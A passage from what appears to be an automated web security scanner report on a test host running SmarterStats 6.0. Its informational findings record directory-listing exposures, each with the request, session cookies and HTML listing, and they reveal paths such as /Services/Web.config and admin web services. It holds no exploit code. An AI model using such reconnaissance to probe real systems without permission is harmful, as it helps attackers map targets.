   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/images/skin/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/images/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 117 <A href="ActionBar_Hover.png">ActionBar_Hover.png</A>
Thursday, October 07, 2010 01:00 PM 886 <A href="ActionBar_Tile.png">ActionBar_Tile.png</A>
Thursday, October 07, 2010 01:00 PM 921 <A href="ButtonHover_Left.png">ButtonHover_Left.png</A>
Thursday, October 07, 2010 01:00 PM 974 <A href="ButtonHover_Tile.png">ButtonHover_Tile.png</A>
Thursday, October 07, 2010 01:00 PM 915 <A href="Button_Left.png">Button_Left.png</A>
Thursday, October 07, 2010 01:00 PM 945 <A href="Button_Tile.png">Button_Tile.png</A>
Thursday, October 07, 2010 01:00 PM 1,915 <A href="DropShadow.png">DropShadow.png</A>
Thursday, October 07, 2010 01:00 PM 5,877 <A href="DropShadowTrans.png">DropShadowTrans.png</A>
Thursday, October 07, 2010 01:00 PM 907 <A href="SearchBar_Cancel.png">SearchBar_Cancel.png</A>
Thursday, October 07, 2010 01:00 PM 907 <A href="SearchBar_CancelGrey.png">SearchBar_CancelGrey.png</A>
Thursday, October 07, 2010 01:00 PM 939 <A href="SearchBar_Search.png">SearchBar_Search.png</A>
Thursday, October 07, 2010 01:00 PM 939 <A href="SearchBar_SearchGrey.png">SearchBar_SearchGrey.png</A>
Thursday, October 07, 2010 01:00 PM 134 <A href="SearchBar_Tile.png">SearchBar_Tile.png</A>
Thursday, October 07, 2010 01:00 PM 895 <A href="SearchBoxGrey_Left.png">SearchBoxGrey_Left.png</A>
Thursday, October 07, 2010 01:00 PM 895 <A href="SearchBoxGrey_Right.png">SearchBoxGrey_Right.png</A>
Thursday, October 07, 2010 01:00 PM 860 <A href="SearchBoxGrey_Tile.png">SearchBoxGrey_Tile.png</A>
Thursday, October 07, 2010 01:00 PM 907 <A href="SearchBox_Left.png">SearchBox_Left.png</A>
Thursday, October 07, 2010 01:00 PM 907 <A href="SearchBox_Right.png">SearchBox_Right.png</A>
Thursday, October 07, 2010 01:00 PM 860 <A href="SearchBox_Tile.png">SearchBox_Tile.png</A>
Thursday, October 07, 2010 01:00 PM 887 <A href="SectionHeader_Left.png">SectionHeader_Left.png</A>
Thursday, October 07, 2010 01:00 PM 889 <A href="SectionHeader_Right.png">SectionHeader_Right.png</A>
Thursday, October 07, 2010 01:00 PM 876 <A href="SectionHeader_Tile.png">SectionHeader_Tile.png</A>
Thursday, October 07, 2010 01:00 PM 861 <A href="TabBar_Tile.png">TabBar_Tile.png</A>
Thursday, October 07, 2010 01:00 PM 1,409 <A href="Tab_Tile.png">Tab_Tile.png</A>
Thursday, October 07, 2010 01:00 PM 853 <A href="Window_BottomSolid.png">Window_BottomSolid.png</A>
Thursday, October 07, 2010 01:00 PM 98 <A href="Window_LeftBottom.png">Window_LeftBottom.png</A>
Thursday, October 07, 2010 01:00 PM 862 <A href="Window_LeftBottomSolid.png">Window_LeftBottomSolid.png</A>
Thursday, October 07, 2010 01:00 PM 852 <A href="Window_LeftSolid.png">Window_LeftSolid.png</A>
Thursday, October 07, 2010 01:00 PM 1,144 <A href="Window_LeftTop.png">Window_LeftTop.png</A>
Thursday, October 07, 2010 01:00 PM 99 <A href="Window_RightBottom.png">Window_RightBottom.png</A>
Thursday, October 07, 2010 01:00 PM 865 <A href="Window_RightBottomSolid.png">Window_RightBottomSolid.png</A>
Thursday, October 07, 2010 01:00 PM 853 <A href="Window_RightSolid.png">Window_RightSolid.png</A>
Thursday, October 07, 2010 01:00 PM 144 <A href="Window_RightTop.png">Window_RightTop.png</A>
Thursday, October 07, 2010 01:00 PM 1,428 <A href="Wizard_Confirmation.gif">Wizard_Confirmation.gif</A>
Thursday, October 07, 2010 01:00 PM 1,347 <A href="Wizard_DataEntry.gif">Wizard_DataEntry.gif</A>
Thursday, October 07, 2010 01:00 PM 1,605 <A href="Wizard_Gear.gif">Wizard_Gear.gif</A>
Thursday, October 07, 2010 01:00 PM 1,221 <A href="Wizard_Information.gif">Wizard_Information.gif</A>
Thursday, October 07, 2010 01:00 PM 1,296 <A href="Wizard_Warning.gif">Wizard_Warning.gif</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.63. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/social_icons/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/images/social_icons/

Request

GET /App_Themes/Default/images/social_icons/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:13:00 GMT
Content-Length: 2973
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/images/social_icons/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/images/social_icons/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/images/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 412 <A href="blinklist.png">blinklist.png</A>
Thursday, October 07, 2010 01:00 PM 147 <A href="blogmarks.png">blogmarks.png</A>
Thursday, October 07, 2010 01:00 PM 1,068 <A href="co.mments.gif">co.mments.gif</A>
Thursday, October 07, 2010 01:00 PM 103 <A href="delicious.png">delicious.png</A>
Thursday, October 07, 2010 01:00 PM 291 <A href="digg.png">digg.png</A>
Thursday, October 07, 2010 01:00 PM 387 <A href="Diigo.gif">Diigo.gif</A>
Thursday, October 07, 2010 01:00 PM 154 <A href="facebook.png">facebook.png</A>
Thursday, October 07, 2010 01:00 PM 362 <A href="feedmelinks.png">feedmelinks.png</A>
Thursday, October 07, 2010 01:00 PM 943 <A href="friendfeed.png">friendfeed.png</A>
Thursday, October 07, 2010 01:00 PM 983 <A href="myspace.png">myspace.png</A>
Thursday, October 07, 2010 01:00 PM 138 <A href="netvouz.png">netvouz.png</A>
Thursday, October 07, 2010 01:00 PM 131 <A href="newsvine.png">newsvine.png</A>
Thursday, October 07, 2010 01:00 PM 980 <A href="reddit.png">reddit.png</A>
Thursday, October 07, 2010 01:00 PM 1,026 <A href="spurl.png">spurl.png</A>
Thursday, October 07, 2010 01:00 PM 780 <A href="StumbleUpon.png">StumbleUpon.png</A>
Thursday, October 07, 2010 01:00 PM 1,074 <A href="Twitter.gif">Twitter.gif</A>
Thursday, October 07, 2010 01:00 PM 294 <A href="wists.png">wists.png</A>
Thursday, October 07, 2010 01:00 PM 186 <A href="yahoo.png">yahoo.png</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.64. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/stats/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/images/stats/

Request

GET /App_Themes/Default/images/stats/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:12:50 GMT
Content-Length: 1396
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/images/stats/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/images/stats/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/images/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 1,371 <A href="Percents.gif">Percents.gif</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.65. http://vulnerable.smarterstats.6.0.host:9999/Client/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Client/

Request

GET /Client/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewReports.aspx/GetReportProgress
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:28:22 GMT
Content-Length: 4189
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /Client/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /Client/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 3,675 <A href="frmCustomReport.aspx">frmCustomReport.aspx</A>
Thursday, October 07, 2010 01:00 PM 4,692 <A href="frmCustomReportItem.aspx">frmCustomReportItem.aspx</A>
Thursday, October 07, 2010 01:00 PM 971 <A href="frmCustomReports.aspx">frmCustomReports.aspx</A>
Thursday, October 07, 2010 01:00 PM 505 <A href="frmDataMineStart.aspx">frmDataMineStart.aspx</A>
Thursday, October 07, 2010 01:00 PM 2,099 <A href="frmEmailReport.aspx">frmEmailReport.aspx</A>
Thursday, October 07, 2010 01:00 PM 1,232 <A href="frmEmailReports.aspx">frmEmailReports.aspx</A>
Thursday, October 07, 2010 01:00 PM 1,503 <A href="frmEmailReportSettings.aspx">frmEmailReportSettings.aspx</A>
Thursday, October 07, 2010 01:00 PM 2,344 <A href="frmExportLogs.aspx">frmExportLogs.aspx</A>
Thursday, October 07, 2010 01:00 PM 3,001 <A href="frmFavoriteReport.aspx">frmFavoriteReport.aspx</A>
Thursday, October 07, 2010 01:00 PM 1,009 <A href="frmFavoriteReports.aspx">frmFavoriteReports.aspx</A>
Thursday, October 07, 2010 01:00 PM 1,549 <A href="frmFilterSets.aspx">frmFilterSets.aspx</A>
Thursday, October 07, 2010 01:00 PM 6,016 <A href="frmImportSettings.aspx">frmImportSettings.aspx</A>
Thursday, October 07, 2010 01:00 PM 1,070 <A href="frmLogsImported.aspx">frmLogsImported.aspx</A>
Thursday, October 07, 2010 01:00 PM 2,094 <A href="frmPageAliases.aspx">frmPageAliases.aspx</A>
Thursday, October 07, 2010 01:00 PM 5,434 <A href="frmSeoCollection.aspx">frmSeoCollection.aspx</A>
Thursday, October 07, 2010 01:00 PM 1,375 <A href="frmSeoCollections.aspx">frmSeoCollections.aspx</A>
Thursday, October 07, 2010 01:00 PM 3,768 <A href="frmSeoCompetitorEvaluation.aspx">frmSeoCompetitorEvaluation.aspx</A>
Thursday, October 07, 2010 01:00 PM 4,977 <A href="frmSeoKeywordEvaluation.aspx">frmSeoKeywordEvaluation.aspx</A>
Thursday, October 07, 2010 01:00 PM 902 <A href="frmSeoProcessingStatus.aspx">frmSeoProcessingStatus.aspx</A>
Thursday, October 07, 2010 01:00 PM 2,814 <A href="frmSeoSettings.aspx">frmSeoSettings.aspx</A>
Thursday, October 07, 2010 01:00 PM 1,241 <A href="frmSkins.aspx">frmSkins.aspx</A>
Thursday, October 07, 2010 01:00 PM 3,711 <A href="frmUser.aspx">frmUser.aspx</A>
Thursday, October 07, 2010 01:00 PM 2,048 <A href="frmUsers.aspx">frmUsers.aspx</A>
Thursday, October 07, 2010 01:00 PM 818 <A href="frmViewOverviewReport.aspx">frmViewOverviewReport.aspx</A>
Thursday, October 07, 2010 01:00 PM 8,309 <A href="frmViewReports.aspx">frmViewReports.aspx</A>
Thursday, October 07, 2010 01:00 PM 1,998 <A href="frmWelcome.aspx">frmWelcome.aspx</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Popups/">Popups</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.66. http://vulnerable.smarterstats.6.0.host:9999/Client/Popups/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Client/Popups/

Request

GET /Client/Popups/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:25:57 GMT
Content-Length: 3232
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /Client/Popups/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /Client/Popups/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/Client/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 1,132 <A href="frmDataMine.aspx">frmDataMine.aspx</A>
Thursday, October 07, 2010 01:00 PM 2,326 <A href="frmDeleteConfirm.aspx">frmDeleteConfirm.aspx</A>
Thursday, October 07, 2010 01:00 PM 1,463 <A href="frmEmailReport.aspx">frmEmailReport.aspx</A>
Thursday, October 07, 2010 01:00 PM 1,078 <A href="frmExportReport.aspx">frmExportReport.aspx</A>
Thursday, October 07, 2010 01:00 PM 2,668 <A href="frmFavoriteReport.aspx">frmFavoriteReport.aspx</A>
Thursday, October 07, 2010 01:00 PM 2,020 <A href="frmFilterSet.aspx">frmFilterSet.aspx</A>
Thursday, October 07, 2010 01:00 PM 1,710 <A href="frmImportDynamicPage.aspx">frmImportDynamicPage.aspx</A>
Thursday, October 07, 2010 01:00 PM 2,284 <A href="frmImportFilter.aspx">frmImportFilter.aspx</A>
Thursday, October 07, 2010 01:00 PM 1,423 <A href="frmPageAlias.aspx">frmPageAlias.aspx</A>
Thursday, October 07, 2010 01:00 PM 658 <A href="frmPrintPreview.aspx">frmPrintPreview.aspx</A>
Thursday, October 07, 2010 01:00 PM 781 <A href="frmReprocess.aspx">frmReprocess.aspx</A>
Thursday, October 07, 2010 01:00 PM 785 <A href="frmRetrieveSEO.aspx">frmRetrieveSEO.aspx</A>
Thursday, October 07, 2010 01:00 PM 1,292 <A href="frmSeoAddItems.aspx">frmSeoAddItems.aspx</A>
Thursday, October 07, 2010 01:00 PM 1,496 <A href="frmSeoCompetitor.aspx">frmSeoCompetitor.aspx</A>
Thursday, October 07, 2010 01:00 PM 3,303 <A href="frmSeoCompetitorRetrieval.aspx">frmSeoCompetitorRetrieval.aspx</A>
Thursday, October 07, 2010 01:00 PM 1,672 <A href="frmSeoKeyword.aspx">frmSeoKeyword.aspx</A>
Thursday, October 07, 2010 01:00 PM 3,238 <A href="frmSeoKeywordRetrieval.aspx">frmSeoKeywordRetrieval.aspx</A>
Thursday, October 07, 2010 01:00 PM 1,997 <A href="frmSiteFileBrowser.aspx">frmSiteFileBrowser.aspx</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.67. http://vulnerable.smarterstats.6.0.host:9999/Services/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Services/

Request

GET /Services/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:14:28 GMT
Content-Length: 2326
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /Services/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /Services/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 100 <A href="Bandwidth.asmx">Bandwidth.asmx</A>
Thursday, October 07, 2010 01:00 PM 104 <A href="Diagnostics.asmx">Diagnostics.asmx</A>
Thursday, October 07, 2010 01:00 PM 104 <A href="ProductInfo.asmx">ProductInfo.asmx</A>
Thursday, October 07, 2010 01:00 PM 92 <A href="Query.asmx">Query.asmx</A>
Thursday, October 07, 2010 01:00 PM 104 <A href="ServerAdmin.asmx">ServerAdmin.asmx</A>
Thursday, October 07, 2010 01:00 PM 100 <A href="SiteAdmin.asmx">SiteAdmin.asmx</A>
Thursday, October 07, 2010 01:00 PM 102 <A href="Statistics.asmx">Statistics.asmx</A>
Thursday, October 07, 2010 01:00 PM 112 <A href="svcGlobalUpdate.asmx">svcGlobalUpdate.asmx</A>
Thursday, October 07, 2010 01:00 PM 118 <A href="svcRealTimeService.asmx">svcRealTimeService.asmx</A>
Thursday, October 07, 2010 01:00 PM 100 <A href="UserAdmin.asmx">UserAdmin.asmx</A>
Thursday, October 07, 2010 01:00 PM 618 <A href="Web.config">Web.config</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.68. http://vulnerable.smarterstats.6.0.host:9999/Temp/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/

Request

GET /Temp/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:30:42 GMT
Content-Length: 16417
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /Temp/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /Temp/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 61 <A href="AboutThisFolder.txt">AboutThisFolder.txt</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.69. http://vulnerable.smarterstats.6.0.host:9999/UserControls/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /UserControls/

Request

GET /UserControls/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:24:01 GMT
Content-Length: 2325
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /UserControls/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /UserControls/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 2,027 <A href="DeleteConfirmation.ascx">DeleteConfirmation.ascx</A>
Thursday, October 07, 2010 01:00 PM 125 <A href="DragDrop.ascx">DragDrop.ascx</A>
Thursday, October 07, 2010 01:00 PM 1,790 <A href="ImportingServerFields.ascx">ImportingServerFields.ascx</A>
Thursday, October 07, 2010 01:00 PM 1,358 <A href="LoadingMessage.ascx">LoadingMessage.ascx</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="PanelBarTemplates/">PanelBarTemplates</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Popups/">Popups</A>
Thursday, October 07, 2010 01:00 PM 1,427 <A href="ProcServerFields.ascx">ProcServerFields.ascx</A>
Thursday, October 07, 2010 01:00 PM 1,386 <A href="SearchBar.ascx">SearchBar.ascx</A>
Thursday, October 07, 2010 01:00 PM 389 <A href="SiteSeoSearchEngineSettings.ascx">SiteSeoSearchEngineSettings.ascx</A>
Thursday, October 07, 2010 01:00 PM 694 <A href="SiteSeoSettings.ascx">SiteSeoSettings.ascx</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.70. http://vulnerable.smarterstats.6.0.host:9999/UserControls/PanelBarTemplates/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /UserControls/PanelBarTemplates/

Request

GET /UserControls/PanelBarTemplates/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/UserControls/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:24:03 GMT
Content-Length: 1700
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /UserControls/PanelBarTemplates/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /UserControls/PanelBarTemplates/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/UserControls/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 5,687 <A href="DataMine.ascx">DataMine.ascx</A>
Thursday, October 07, 2010 01:00 PM 2,382 <A href="EventsPanel.ascx">EventsPanel.ascx</A>
Thursday, October 07, 2010 01:00 PM 208 <A href="ReportOptions.ascx">ReportOptions.ascx</A>
Thursday, October 07, 2010 01:00 PM 998 <A href="SectionNavigator.ascx">SectionNavigator.ascx</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.71. http://vulnerable.smarterstats.6.0.host:9999/UserControls/Popups/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /UserControls/Popups/

Request

GET /UserControls/Popups/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
